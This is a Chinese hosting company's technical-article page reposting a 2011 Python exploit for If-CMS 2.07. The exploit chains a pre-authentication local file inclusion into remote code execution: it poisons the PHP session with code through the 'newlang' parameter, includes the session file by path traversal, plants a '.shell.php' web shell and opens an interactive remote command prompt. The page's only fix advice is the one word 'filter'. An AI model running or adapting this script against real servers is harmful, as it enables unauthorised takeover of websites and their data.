您好,欢迎来到思海网络,我们将竭诚为您提供优质的服务! 诚征网络推广 | 网站备案 | 帮助中心 | 软件下载 | 购买流程 | 付款方式 | 联系我们 [ 会员登录/注册 ]
促销推广
客服中心
业务咨询
有事点击这里…  531199185
有事点击这里…  61352289
点击这里给我发消息  81721488
有事点击这里…  376585780
有事点击这里…  872642803
有事点击这里…  459248018
有事点击这里…  61352288
有事点击这里…  380791050
技术支持
有事点击这里…  714236853
有事点击这里…  719304487
有事点击这里…  1208894568
有事点击这里…  61352289
在线客服
有事点击这里…  531199185
有事点击这里…  61352288
有事点击这里…  983054746
有事点击这里…  893984210
当前位置:首页 >> 技术文章 >> 文章浏览
技术文章

If-CMS 2.07 Pre-Auth 本地文件包含漏洞及修复

添加时间:2011-3-16  添加: admin 

If-CMS是一款免费开源的内容管理系统,If-CMS存在本地文件包含漏洞,可能导致敏感信息泄露。

[+]info:
~~~~~~~~~
If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit

[+]poc:
~~~~~~~~~

#!/usr/bin/python
# ~INFORMATION
# Exploit Title: If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit
# Author:  TecR0c
# Date:   13/3/2011
# Software link: http://bit.ly/hh9ZB4
# Tested on:  Linux bt
# Version:  2.07
# PHP.ini Settings: gpc_magic_quotes = Off

import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass
from optparse import OptionParser
from urlparse import urlparse,urljoin
from urllib import urlopen
from cookielib import CookieJar

__CONTACT__ ="TecR0c(tecr0c@tecninja.net)"
__DATE__ ="13.3.2011"

usage = 'Example : %s http://localhost/ncms/ -p 127.0.0.1:8080' % __file__
parser = OptionParser(usage=usage)
parser.add_option("-p","--proxy", type="string",action="store", dest="proxy",
        help="HTTP Proxy <server>:<port>")

(options, args) = parser.parse_args()

if options.proxy:
        print '[+] Using Proxy'+options.proxy

# User Agents
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
        "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",
        "Google Chrome 0.2.149.29 (Windows XP)",
        "Opera 9.25 (Windows Vista)",
        "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
        "Opera/8.00 (Windows NT 5.1; U; en)"]
agent = random.choice(agents)

traversal = '../../../../../../../../../../../..'
sessionLocation = '/var/lib/php5/'

def banner():
    if os.name == "posix":
        os.system("clear")
    else:
        os.system("cls")
    header = '''
|----------------------------------------|
|Exploit: If-CMS 2.07 LFI RCE
|Author: %s
|Date: %s
|----------------------------------------|\n
'''%(__CONTACT__,__DATE__)
    for i in header:
        print "\b%s"%i,
        sys.stdout.flush()
        time.sleep(0.005)

def injectPayload():
 webSiteUrl = url.geturl()+'index.php?newlang=<?php;system(base64_decode($_REQUEST[cmd]));?>'
        try:
                opener.open(webSiteUrl)
        except:
                print '[-] Failed'

def proxyCheck():
        if options.proxy:
                try:
                        h2 = httplib.HTTPConnection(options.proxy)
                        h2.connect()
                        print "[+] Using Proxy Server:",options.proxy
                except(socket.timeout):
                        print "[-] Proxy Timed Out\n"
                        pass
                        sys.exit(1)
                except(NameError):
                        print "[-] Proxy Not Given\n"
                        pass
                        sys.exit(1)
                except:
                        print "[-] Proxy Failed\n"
                        pass
                        sys.exit(1)

def getProxy():
        try:
                proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
        except(socket.timeout):
                print "\n[-] Proxy Timed Out"
                sys.exit(1)
        return proxy_handler

cj = CookieJar()
if options.proxy:
        opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
else:
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders = [('User-agent', agent)]

def postRequestWebShell(encodedCommand):
        webSiteUrl = url.geturl()+'.shell.php'
        commandToExecute = [
        ('cmd',encodedCommand)]
        cmdData = urllib.urlencode(commandToExecute)
        try:
                response = opener.open(webSiteUrl, cmdData).read()
        except:
                print '[-] Failed'
                sys.exit()
        return response

def writeOutShell(encodedCommand):
 cookieString = str(cj)
 cookieSearch = re.compile(r"PHPSESSID=(.*) f")
 session_value = cookieSearch.search(cookieString)
 if session_value:
  session_value = session_value.group(1)
 cj.clear()
 webSiteUrl = url.geturl()+'index.php?cmd='+encodedCommand+'&newlang='+traversal+sessionLocation+'sess_'+session_value+'%00'
 try:
                opener.open(webSiteUrl)
        except:
                print '[-] Failed'
                sys.exit()

def commandLine():
        encodedCommand = "echo '<?php system(base64_decode($_REQUEST[cmd]));?>' > .shell.php"
        encodedCommand = base64.b64encode(encodedCommand)
        writeOutShell(encodedCommand)
        commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc)
        while True:
                try:
                        command = raw_input(commandLine)
                        encodedCommand = base64.b64encode(command)
                        response = postRequestWebShell(encodedCommand)
                        print response
                except KeyboardInterrupt:
                        encodedCommand = base64.b64encode('rm .shell.php')
                        postRequestWebShell(encodedCommand)
                        print "\n[!] Removed .shell.php\n"
                        sys.exit()

if "__main__" == __name__:
        banner()
        try:
                url=urlparse(args[0])
        except:
                parser.print_help()
                sys.exit()
        getProxy()
        proxyCheck()
 injectPayload()
 commandLine()

修复:过滤

关健词:If-CMS

分享到:

顶部 】 【 关闭
版权所有:佛山思海电脑网络有限公司 ©1998-2024 All Rights Reserved.
联系电话:(0757)22630313、22633833
中华人民共和国增值电信业务经营许可证: 粤B1.B2-20030321 备案号:粤B2-20030321-1
网站公安备案编号:44060602000007 交互式栏目专项备案编号:200303DD003  
察察 工商 网安 举报有奖  警警  手机打开网站